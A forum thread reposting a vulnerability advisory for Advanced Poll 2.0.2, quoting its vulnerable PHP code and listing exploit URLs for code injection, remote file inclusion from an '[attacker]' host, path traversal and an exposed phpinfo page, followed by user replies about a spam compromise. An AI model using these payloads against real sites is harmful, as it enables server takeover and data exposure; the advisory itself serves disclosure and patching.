Advanced Poll Remote Information Disclosure Vulnerability

Jam'n — GMT

It seems there is also a bug Advanced Poll 2.0.2

°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

comments.php :

------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");

for ($i=0;$i if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
} elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
} else {
eval("\$$register_poll_vars[$i] = '';");
}
}
[...]
------------------------------------------------------------------------------------------------------

booth.php, png.php :

---------------------------------------------------------------

$include_path = dirname(__FILE__);
if ($include_path == "/") {
$include_path = ".";
}

if (!isset($PHP_SELF)) {
global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}

require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------

poll_ssi.php, popup.php :

----------------------
include "./booth.php";
----------------------

admin/common.inc.php :

---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}

$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
include ("$base_path/lang/$pollvars[lang]");
} else {
include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------

In the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

:

------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);

require "./common.inc.php";
[...]
------------------------------------

misc/info.php :

-------------------------

PHP Info

phpinfo();
?>
-------------------------

Exploits :
°°°°°°°°

- if magic_quotes_gpc=OFF :

http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//

or with a POST form or cookies.

- This will only work if register_globals=OFF (this is not an error...) :

http://[target]/booth.php?include_path=http://[attacker] (or with png.php,
poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php

- This will work if register_globals=OFF OR ON :

http://[target]/admin/common.inc.php?basepath=http://[attacker] will include
the file http://[attacker]/lang/english.php.

The same hole can be found, in the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view
will include the file http://[target]/admin/../../../file/to/view

- http://[target]/misc/info.php will show the phpinfo().

Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .

Credits :
°°°°°°°°
frog-mn
http://www.phpsecure.info

hailstone — GMT

I found out this the hard way. With version 2.03 of Advanced Poll the attackers used external scripts to send spam. Only when the web host disabled the website due to spam complaints did we find out.

I hope this has been fixed in newer versions (I couldn't find a change log to check) before it happens to someone else.

Carbonize — GMT

This is why you should always make sure your scripts are up to date.

hailstone — GMT

Yes. Does that mean it is fixed?

Carbonize — GMT

To the best of my knowledge but as no changelog is produced and I am not a user of the Poll I couldn't say.

hailstone — GMT

Ok, thanks for your help.

indi456 — GMT

I found out this the hard way. With version 2.03 of Advanced Poll the attackers used external scripts to send spam. Only when the web host disabled the website due to spam complaints did we find out.

Latest posts for the topic "Advanced Poll Remote Information Disclosure Vulnerability"

Advanced Poll Remote Information Disclosure Vulnerability